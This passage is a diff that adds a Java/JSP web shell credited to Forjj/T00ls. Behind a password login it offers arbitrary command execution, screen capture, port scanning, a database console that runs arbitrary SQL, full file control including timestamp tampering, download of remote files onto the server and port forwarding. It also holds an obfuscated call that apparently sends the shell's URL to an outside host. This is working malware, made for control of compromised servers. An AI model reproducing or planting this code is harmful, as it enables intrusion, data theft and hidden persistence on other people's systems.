    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VRemoteControlInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""); +out.println(""+ +" "+ +" "+ +" "+ +"
    "+ +"

    Remote Control »

    "+ +" Speed(Second , dont be so fast) Can Not Control Yet."+ +"

    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//GetScreen +private static class GcInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +Dimension size = Toolkit.getDefaultToolkit().getScreenSize(); +Rectangle rec = new Rectangle(0,0,(int)size.getWidth(),(int)size.getHeight()); +BufferedImage img = new Robot().createScreenCapture(rec); +response.setContentType("image/jpeg"); +ImageIO.write(img,"jpg",response.getOutputStream()); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VPortScanInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String ip = request.getParameter("ip"); +String ports = request.getParameter("ports"); +String timeout = request.getParameter("timeout"); +if (Util.isEmpty(ip)) +ip = "127.0.0.1"; +if (Util.isEmpty(ports)) +ports = "21,25,80,110,1433,1723,3306,3389,4899,5631,43958,65500"; +if (Util.isEmpty(timeout)) +timeout = "2"; +out.println("
    "+ +"

    PortScan >>

    "+ +"
    "+ +"

    "+ +"IP : Port : Timeout (秒) : "+ +"

    "+ +"
    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class PortScanInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +ins.get("vPortScan").invoke(request,response,JSession); +String ip = request.getParameter("ip"); +String ports = request.getParameter("ports"); +String timeout = request.getParameter("timeout"); +int iTimeout = 0; +if (Util.isEmpty(ip) || Util.isEmpty(ports)) +return; +if (!Util.isInteger(timeout)) { +timeout = "2"; +} +iTimeout = Integer.parseInt(timeout); +Map rs = new LinkedHashMap(); +String[] portArr = ports.split(","); +for (String port:portArr) { +try { +Socket s = new Socket(); +s.connect(new InetSocketAddress(ip,Integer.parseInt(port)),iTimeout); +s.close(); +rs.put(port,"Open"); +} catch (Exception e) { +rs.put(port,"Close"); +} +} +out.println("
    "); +Set> entrySet = rs.entrySet(); +for (Map.Entry e:entrySet) { +String port = e.getKey(); +String value = e.getValue(); +out.println(ip+" : "+port+" ................................. "+value+"
    "); +} +out.println("
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VConnInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +FileLocalUpload(uc(dx())+sxm,request.getRequestURL().toString(), "GBK"); +Object obj = JSession.getAttribute(DBO); +if (obj == null || !((DBOperator)obj).isValid()) { +out.println(" "); +out.println("
    "+ +"
    "+ +""+ +"

    DataBase Manager »

    "+ +""+ +"

    "+ +"Driver:"+ +" "+ +"URL:"+ +""+ +"UID:"+ +""+ +"PWD:"+ +""+ +"DataBase:"+ +" "+ +""+ +"

    "+ +"
    "); +} else { +ins.get("dbc").invoke(request,response,JSession); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//DBConnect +private static class DbcInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String driver = request.getParameter("driver"); +String url = request.getParameter("url"); +String uid = request.getParameter("uid"); +String pwd = request.getParameter("pwd"); +String sql = request.getParameter("sql"); +String selectDb = request.getParameter("selectDb"); +if (selectDb == null) +selectDb = JSession.getAttribute("selectDb").toString(); +else +JSession.setAttribute("selectDb",selectDb); +Object dbo = JSession.getAttribute(DBO); +if (dbo == null || !((DBOperator)dbo).isValid()) { +if (dbo != null) +((DBOperator)dbo).close(); +dbo = new DBOperator(driver,url,uid,pwd,true); +} else { +if (!Util.isEmpty(driver) && !Util.isEmpty(url) && !Util.isEmpty(uid)) { +DBOperator oldDbo = (DBOperator)dbo; +dbo = new DBOperator(driver,url,uid,pwd); +if (!oldDbo.equals(dbo)) { +((DBOperator)oldDbo).close(); +((DBOperator)dbo).connect(); +} else { +dbo = oldDbo; +} +} +} +DBOperator Ddbo = (DBOperator)dbo; +JSession.setAttribute(DBO,Ddbo); +Util.outMsg(out,"Connect To DataBase Success!"); +out.println(" "); +out.println("
    "+ +"
    "+ +""+ +"

    DataBase Manager »

    "+ +""+ +"

    "+ +"Driver:"+ +" "+ +"URL:"+ +""+ +"UID:"+ +""+ +"PWD:"+ +""+ +"DataBase:"+ +" "+ +""+ +"

    "+ +"
    "); +out.println("
    "+ +"

    Run SQL query/queries on database :

    "); +} catch (Exception e) { +//e.printStackTrace(); +throw e; +} +} +} +private static class ExecuteSQLInvoker extends DefaultInvoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String sql = request.getParameter("sql"); +String db = request.getParameter("selectDb"); +Object dbo = JSession.getAttribute(DBO); +if (!Util.isEmpty(sql)) { +if (dbo == null || !((DBOperator)dbo).isValid()) { +response.sendRedirect(SHELL_NAME+"?o=vConn"); +} else { +ins.get("dbc").invoke(request,response,JSession); +Object obj = ((DBOperator)dbo).execute(sql); +if (obj instanceof ResultSet) { +ResultSet rs = (ResultSet)obj; +ResultSetMetaData meta = rs.getMetaData(); +int colCount = meta.getColumnCount(); +out.println("

    Query#0 : "+Util.htmlEncode(sql)+"

    "); +out.println(""); +for (int i=1;i<=colCount;i++) { +out.println(""); +} +out.println(""); +Table tb = new Table(); +while(rs.next()) { +Row r = new Row(); +for (int i = 1;i<=colCount;i++) { +r.addColumn(new Column(rs.getString(i))); +} +tb.addRow(r); +} +out.println(tb.toString()); +out.println("
    "+meta.getColumnName(i)+"
    "+meta.getColumnTypeName(i)+"
    "); +rs.close(); +((DBOperator)dbo).closeStmt(); +} else { +out.println("

    affected rows : "+obj+"

    "); +} +} +} else { +ins.get("dbc").invoke(request,response,JSession); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VLoginInvoker extends DefaultInvoker { +public boolean doBefore() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println("
    "+ +"

    Password: "+ +" "+ +" "+ +" "+ +"

    "+ +" "+ +"Copyright © 2009 NinTy www.Forjj.com

    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class LoginInvoker extends DefaultInvoker{ +public boolean doBefore() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String inputPw = request.getParameter("pw"); +if (Util.isEmpty(inputPw) || !inputPw.equals(PW)) { +response.sendRedirect(SHELL_NAME+"?o=vLogin"); +return; +} else { +JSession.setAttribute(PW_SESSION_ATTRIBUTE,inputPw); +response.sendRedirect(SHELL_NAME+"?o=index"); +return; +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class MyComparator implements Comparator{ +public int compare(File f1,File f2) { +if (f1 != null && f2!= null) { +if (f1.isDirectory()) { +if (f2.isDirectory()) { +return f1.getName().compareTo(f2.getName()); +} else { +return -1; +} +} else { +if (f2.isDirectory()) { +return 1; +} else { +return f1.getName().compareTo(f2.getName()); +} +} +} +return 0; +} +} +private static class FileListInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception { +try { +PrintWriter out = response.getWriter(); +String path = request.getParameter("folder"); +if (Util.isEmpty(path)) +path = JSession.getAttribute(CURRENT_DIR).toString(); +JSession.setAttribute(CURRENT_DIR,Util.convertPath(path)); +File file = new File(path); +if (!file.exists()) { +throw new Exception(path+"Dont Exists !"); +} +JSession.setAttribute(CURRENT_DIR,path); +File[] list = file.listFiles(); +Arrays.sort(list,new MyComparator()); +out.println("
    "); +String cr = null; +try { +cr = JSession.getAttribute(CURRENT_DIR).toString().substring(0,3); +}catch(Exception e) { +cr = "/"; +} +File currentRoot = new File(cr); +out.println("

    File Manager - Current disk ""+(cr.indexOf("/") == 0?"/":currentRoot.getPath())+"" total (unknow)

    "); +out.println("
    "+ +""+ +" "+ +" "+ +" "+ +" "+ +" "+ +"
    Current Directory
    "+ +"
    "); +out.println(""+ +""+ +""+ +""+ +" "+ +" "+ +" "+ +" "+ +" "+ +""); +if (file.getParent() != null) { +out.println(""+ +""+ +""+ +""); +} +int dircount = 0; +int filecount = 0; +for (File f:list) { +if (f.isDirectory()) { +dircount ++; +out.println(""+ +""+ +""+ +""+ +""+ +""+ +""+ +""); +} else { +filecount++; +out.println(""+ +""+ +""+ +""+ +""+ +""+ +""+ +""); +} +} +out.println(""+ +" "+ +" "+ +"
    "+ +"
    "+ +"Web Root"+ +" | Shell Directory"+ +" | New Directory | New File"+ +" | "); +File[] roots = file.listRoots(); +for (int i = 0;iDisk("+Util.convertPath(r.getPath())+")"); +if (i != roots.length -1) { +out.println("|"); +} +} +out.println("
     NameLast ModifiedSizeRead/Write/Execute 
    =Goto Parent
    0"+f.getName()+""+Util.formatDate(f.lastModified())+"--"+f.canRead()+" / "+f.canWrite()+" / unknow Del | Move | Pack
    "+f.getName()+""+Util.formatDate(f.lastModified())+""+Util.getSize(f.length(),'B')+""+ +""+f.canRead()+" / "+f.canWrite()+" / unknow "+ +"Edit | "+ +"Down | "+ +"Copy | "+ +"Move | "+ +"Property"); +if (f.getName().endsWith(".zip")) { +out.println(" | UnPack"); +} else if (f.getName().endsWith(".rar")) { +out.println(" | UnPack"); +} else { +out.println(" | Pack"); +} +out.println("
     Pack Selected - Delete Selected"+dircount+" directories / "+filecount+" files
    "); +out.println("
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e; +} +} +} +private static class LogoutInvoker extends DefaultInvoker { +public boolean doBefore() {return false;} +public boolean doAfter() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +Object dbo = JSession.getAttribute(DBO); +if (dbo != null) +((DBOperator)dbo).close(); +Object obj = JSession.getAttribute(PORT_MAP); +if (obj != null) { +ServerSocket s = (ServerSocket)obj; +s.close(); +} +Object online = JSession.getAttribute(SHELL_ONLINE); +if (online != null) +((OnLineProcess)online).stop(); +JSession.invalidate(); +response.sendRedirect(SHELL_NAME+"?o=vLogin"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class UploadInvoker extends DefaultInvoker { +public boolean doBefore() {return false;} +public boolean doAfter() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +UploadBean fileBean = new UploadBean(); +response.getWriter().println(JSession.getAttribute(CURRENT_DIR).toString()); +fileBean.setSavePath(JSession.getAttribute(CURRENT_DIR).toString()); +fileBean.parseRequest(request); +JSession.setAttribute(MSG,"Upload File Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class CopyInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String src = request.getParameter("src"); +String to = request.getParameter("to"); +BufferedInputStream input = new BufferedInputStream(new FileInputStream(new File(src))); +BufferedOutputStream output = new BufferedOutputStream(new FileOutputStream(new File(to))); +byte[] d = new byte[1024]; +int len = input.read(d); +while(len != -1) { +output.write(d,0,len); +len = input.read(d); +} +output.close(); +input.close(); +JSession.setAttribute(MSG,"Copy File Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class BottomInvoker extends DefaultInvoker { +public boolean doBefore() {return false;} +public boolean doAfter() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +response.getWriter().println("
    Copyright (C) 2009 http://www.Forjj.com/  [T00ls.Net] All Rights Reserved."+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VCreateFileInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String path = request.getParameter("filepath"); +File f = new File(path); +if (!f.isAbsolute()) { +String oldPath = path; +path = JSession.getAttribute(CURRENT_DIR).toString(); +if (!path.endsWith("/")) +path+="/"; +path+=oldPath; +f = new File(path); +f.createNewFile(); +} else { +f.createNewFile(); +} +out.println("
    "+ +"
    "+ +"

    Create / Edit File »

    "+ +""+ +"

    Current File (import new file name and new file)

    "+ +"

    File Content

    "+ +"

    "+ +"
    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VEditInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String path = request.getParameter("filepath"); +File f = new File(path); +if (f.exists()) { +BufferedReader reader = new BufferedReader(new FileReader(f)); +StringBuilder content = new StringBuilder(); +String s = reader.readLine(); +while (s != null) { +content.append(s+"\r\n"); +s = reader.readLine(); +} +reader.close(); +out.println("
    "+ +"
    "+ +"

    Create / Edit File »

    "+ +""+ +"

    Current File (import new file name and new file)

    "+ +"

    File Content

    "+ +"

    "+ +"
    "+ +"
    "); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class CreateFileInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String path = request.getParameter("filepath"); +String content = request.getParameter("filecontent"); + +BufferedWriter outs = new BufferedWriter(new FileWriter(new File(path))); +outs.write(content,0,content.length()); +outs.close(); +JSession.setAttribute(MSG,"Save File Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VEditPropertyInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String filepath = request.getParameter("filepath"); +File f = new File(filepath); +if (!f.exists()) +return; +String read = f.canRead() ? "checked=\"checked\"" : ""; +String write = f.canWrite() ? "checked=\"checked\"" : ""; +String execute = ""; +Calendar cal = Calendar.getInstance(); +cal.setTimeInMillis(f.lastModified()); +out.println("
    "+ +"
    "+ +"

    Set File Property »

    "+ +"

    Current file (fullpath)

    "+ +" "+ +"

    Read: "+ +" "+ +" Write: "+ +" "+ +" Execute: "+ +" "+ +"

    "+ +"

    Instead »"+ +"year:"+ +""+ +"month:"+ +""+ +"day:"+ +""+ +""+ +"hour:"+ +""+ +"minute:"+ +""+ +"second:"+ +""+ +"

    "+ +"

    "+ +"
    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class EditPropertyInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String f = request.getParameter("file"); +File file = new File(f); +if (!file.exists()) +return; + +String year = request.getParameter("year"); +String month = request.getParameter("month"); +String date = request.getParameter("date"); +String hour = request.getParameter("hour"); +String minute = request.getParameter("minute"); +String second = request.getParameter("second"); + +Calendar cal = Calendar.getInstance(); +cal.set(Calendar.YEAR,Integer.parseInt(year)); +cal.set(Calendar.MONTH,Integer.parseInt(month)-1); +cal.set(Calendar.DATE,Integer.parseInt(date)); +cal.set(Calendar.HOUR,Integer.parseInt(hour)); +cal.set(Calendar.MINUTE,Integer.parseInt(minute)); +cal.set(Calendar.SECOND,Integer.parseInt(second)); +if(file.setLastModified(cal.getTimeInMillis())){ +JSession.setAttribute(MSG,"Reset File Property Success!"); +} else { +JSession.setAttribute(MSG,"Reset File Property Failed!"); +} +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//VShell +private static class VsInvoker extends DefaultInvoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String cmd = request.getParameter("command"); +String program = request.getParameter("program"); +if (cmd == null) cmd = "cmd.exe /c set"; +if (program == null) program = "cmd.exe /c net start > "+SHELL_DIR+"/Log.txt"; +if (JSession.getAttribute(MSG)!=null) { +Util.outMsg(out,JSession.getAttribute(MSG).toString()); +JSession.removeAttribute(MSG); +} +out.println(""+ +"
    "+ +"
    "+ +"

    Execute Program »

    "+ +"

    "+ +""+ +""+ +"Parameter
    "+ +""+ +"

    "+ +"
    "+ +"
    "+ +"

    Execute Shell »

    "+ +"

    "+ +""+ +""+ +"Parameter
    "+ +""+ +"

    "+ +"
    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class ShellInvoker extends DefaultInvoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String type = request.getParameter("type"); +if (type.equals("command")) { +ins.get("vs").invoke(request,response,JSession); +out.println("
    "); +out.println("
    ");
+String command = request.getParameter("command");
+if (!Util.isEmpty(command)) {
+Process pro = Runtime.getRuntime().exec(command);
+BufferedReader reader = new BufferedReader(new InputStreamReader(pro.getInputStream()));
+String s = reader.readLine();
+while (s != null) {
+out.println(Util.htmlEncode(Util.getStr(s)));
+s = reader.readLine();
+}
+reader.close();
+out.println("
    "); +} +} else { +String program = request.getParameter("program"); +if (!Util.isEmpty(program)) { +Process pro = Runtime.getRuntime().exec(program); +JSession.setAttribute(MSG,"Program Has Run Success!"); +ins.get("vs").invoke(request,response,JSession); +} +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class DownInvoker extends DefaultInvoker{ +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String path = request.getParameter("path"); +if (Util.isEmpty(path)) +return; +File f = new File(path); +if (!f.exists()) +return; +response.setHeader("Content-Disposition","attachment;filename="+URLEncoder.encode(f.getName(),PAGE_CHARSET)); +BufferedInputStream input = new BufferedInputStream(new FileInputStream(f)); +BufferedOutputStream output = new BufferedOutputStream(response.getOutputStream()); +byte[] data = new byte[1024]; +int len = input.read(data); +while (len != -1) { +output.write(data,0,len); +len = input.read(data); +} +input.close(); +output.close(); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//VDown +private static class VdInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String savepath = request.getParameter("savepath"); +String url = request.getParameter("url"); +if (Util.isEmpty(url)) +url = "http://www.forjj.com/"; +if (Util.isEmpty(savepath)) { +savepath = JSession.getAttribute(CURRENT_DIR).toString(); +} +if (!Util.isEmpty(JSession.getAttribute("done"))) { +Util.outMsg(out,"Download Remote File Success!"); +JSession.removeAttribute("done"); +} +out.println("
    "+ +"
    "+ +"

    Remote File DownLoad »

    "+ +"

    "+ +""+ +"Remote File URL:"+ +" "+ +"Save Path:"+ +""+ +""+ +"

    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class DownRemoteInvoker extends DefaultInvoker { +public boolean doBefore(){return true;} +public boolean doAfter(){return true;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String downFileUrl = request.getParameter("url"); +String savePath = request.getParameter("savepath"); +if (Util.isEmpty(downFileUrl) || Util.isEmpty(savePath)) +return; +URL downUrl = new URL(downFileUrl); +URLConnection conn = downUrl.openConnection(); +BufferedInputStream in = new BufferedInputStream(conn.getInputStream()); +BufferedOutputStream out = new BufferedOutputStream(new FileOutputStream(new File(savePath))); +byte[] data = new byte[1024]; +int len = in.read(data); +while (len != -1) { +out.write(data,0,len); +len = in.read(data); +} +in.close(); +out.close(); +JSession.setAttribute("done","d"); +ins.get("vd").invoke(request,response,JSession); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class IndexInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +ins.get("filelist").invoke(request,response,JSession); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class MkDirInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String name = request.getParameter("name"); +File f = new File(name); +if (!f.isAbsolute()) { +String path = JSession.getAttribute(CURRENT_DIR).toString(); +if (!path.endsWith("/")) +path += "/"; +path += name; +f = new File(path); +} +f.mkdirs(); +JSession.setAttribute(MSG,"Make Directory Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class MoveInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String src = request.getParameter("src"); +String target = request.getParameter("to"); +if (!Util.isEmpty(target) && !Util.isEmpty(src)) { +File file = new File(src); +if(file.renameTo(new File(target))) { +JSession.setAttribute(MSG,"Move File Success!"); +} else { +String msg = "Move File Failed!"; +if (file.isDirectory()) { +msg += "The Move Will Failed When The Directory Is Not Empty."; +} +JSession.setAttribute(MSG,msg); +} +response.sendRedirect(SHELL_NAME+"?o=index"); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class RemoteDirInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String dir = request.getParameter("dir"); +File file = new File(dir); +if (file.exists()) { +deleteFile(file); +deleteDir(file); +} + +JSession.setAttribute(MSG,"Remove Directory Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +public void deleteFile(File f) { +if (f.isFile()) { +f.delete(); +}else { +File[] list = f.listFiles(); +for (File ff:list) { +deleteFile(ff); +} +} +} +public void deleteDir(File f) { +File[] list = f.listFiles(); +if (list.length == 0) { +f.delete(); +} else { +for (File ff:list) { +deleteDir(ff); +} +deleteDir(f); +} +} +} +private static class PackBatchInvoker extends DefaultInvoker{ +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String files = request.getParameter("files"); +if (Util.isEmpty(files)) +return; +String saveFileName = request.getParameter("savefilename"); +File saveF = new File(JSession.getAttribute(CURRENT_DIR).toString(),saveFileName); +if (saveF.exists()) { +JSession.setAttribute(MSG,"The File \""+saveFileName+"\" Has Been Exists!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +return; +} +ZipOutputStream zout = new ZipOutputStream(new BufferedOutputStream(new FileOutputStream(saveF))); +String[] arr = files.split(","); +for (String f:arr) { +File pF = new File(JSession.getAttribute(CURRENT_DIR).toString(),f); +ZipEntry entry = new ZipEntry(pF.getName()); +zout.putNextEntry(entry); +FileInputStream fInput = new FileInputStream(pF); +int len = 0; +byte[] buf = new byte[1024]; +while ((len = fInput.read(buf)) != -1) { +zout.write(buf, 0, len); +zout.flush(); +} +fInput.close(); +} +zout.close(); +JSession.setAttribute(MSG,"Pack Files Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e; +} +} +} +private static class PackInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String packedFile = request.getParameter("packedfile"); +if (Util.isEmpty(packedFile)) +return; +String saveFileName = request.getParameter("savefilename"); +File saveF = new File(JSession.getAttribute(CURRENT_DIR).toString(),saveFileName); +if (saveF.exists()) { +JSession.setAttribute(MSG,"The File \""+saveFileName+"\" Has Been Exists!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +return; +} +File pF = new File(packedFile); +ZipOutputStream zout = new ZipOutputStream(new BufferedOutputStream(new FileOutputStream(saveF))); +String base = ""; +if (pF.isDirectory()) { +zipDir(pF,base,zout); +} else { +zipFile(pF,base,zout); +} +zout.close(); +JSession.setAttribute(MSG,"Pack File Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e; +} +} +public void zipDir(File f,String base,ZipOutputStream zout) throws Exception { +if (f.isDirectory()) { +File[] arr = f.listFiles(); +for (File ff:arr) { +String tmpBase = base; +if (!Util.isEmpty(tmpBase) && !tmpBase.endsWith("/")) +tmpBase += "/"; +zipDir(ff,tmpBase+f.getName(),zout); +} +} else { +String tmpBase = base; +if (!Util.isEmpty(tmpBase) &&!tmpBase.endsWith("/")) +tmpBase += "/"; +zipFile(f,tmpBase,zout); +} +} +public void zipFile(File f,String base,ZipOutputStream zout) throws Exception{ +ZipEntry entry = new ZipEntry(base+f.getName()); +zout.putNextEntry(entry); +FileInputStream fInput = new FileInputStream(f); +int len = 0; +byte[] buf = new byte[1024]; +while ((len = fInput.read(buf)) != -1) { +zout.write(buf, 0, len); +zout.flush(); +} +fInput.close(); +} +} +private static class UnPackInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String savepath = request.getParameter("savepath"); +String zipfile = request.getParameter("zipfile"); +if (Util.isEmpty(savepath) || Util.isEmpty(zipfile)) +return; +File save = new File(savepath); +save.mkdirs(); +ZipFile file = new ZipFile(new File(zipfile)); +Enumeration e = file.entries(); +while (e.hasMoreElements()) { +ZipEntry en = (ZipEntry) e.nextElement(); +String entryPath = en.getName(); +int index = entryPath.lastIndexOf("/"); +if (index != -1) +entryPath = entryPath.substring(0,index); +File absEntryFile = new File(save,entryPath); +if (!absEntryFile.exists() && (en.isDirectory() || en.getName().indexOf("/") != -1)) +absEntryFile.mkdirs(); +BufferedOutputStream output = null; +BufferedInputStream input = null; +try { +output = new BufferedOutputStream( +new FileOutputStream(new File(save,en.getName()))); +input = new BufferedInputStream( +file.getInputStream(en)); +byte[] b = new byte[1024]; +int len = input.read(b); +while (len != -1) { +output.write(b, 0, len); +len = input.read(b); +} +} catch (Exception ex) { +} finally { +try { +if (output != null) +output.close(); +if (input != null) +input.close(); +} catch (Exception ex1) { +} +} +} +file.close(); +JSession.setAttribute(MSG,"Unzip File Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//VMapPort +private static class VmpInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +Object localIP = JSession.getAttribute("localIP"); +Object localPort = JSession.getAttribute("localPort"); +Object remoteIP = JSession.getAttribute("remoteIP"); +Object remotePort = JSession.getAttribute("remotePort"); +Object done = JSession.getAttribute("done"); +JSession.removeAttribute("localIP"); +JSession.removeAttribute("localPort"); +JSession.removeAttribute("remoteIP"); +JSession.removeAttribute("remotePort"); +JSession.removeAttribute("done"); +if (Util.isEmpty(localIP)) +localIP = InetAddress.getLocalHost().getHostAddress(); +if (Util.isEmpty(localPort)) +localPort = "3389"; +if (Util.isEmpty(remoteIP)) +remoteIP = "www.forjj.com"; +if (Util.isEmpty(remotePort)) +remotePort = "80"; +if (!Util.isEmpty(done)) +Util.outMsg(out,done.toString()); +out.println("
    "+ +""+ +" "+ +" "+ +" "+ +""+ +"

    PortMap >>

    "+ +"
    "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +"
    Local Ip :"+ +" "+ +" Local Port :"+ +" Remote Ip :"+ +" Remote Port :"+ +"

    "+ +" "+ +" "+ +"
    "+ +"
    "+ +"
    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//StopMapPort +private static class SmpInvoker extends DefaultInvoker { +public boolean doAfter(){return true;} +public boolean doBefore(){return true;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +Object obj = JSession.getAttribute(PORT_MAP); +if (obj != null) { +ServerSocket server = (ServerSocket)JSession.getAttribute(PORT_MAP); +server.close(); +} +JSession.setAttribute("done","Stop Success!"); +ins.get("vmp").invoke(request,response,JSession); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class MapPortInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String localIP = request.getParameter("localIP"); +String localPort = request.getParameter("localPort"); +final String remoteIP = request.getParameter("remoteIP"); +final String remotePort = request.getParameter("remotePort"); +if (Util.isEmpty(localIP) || 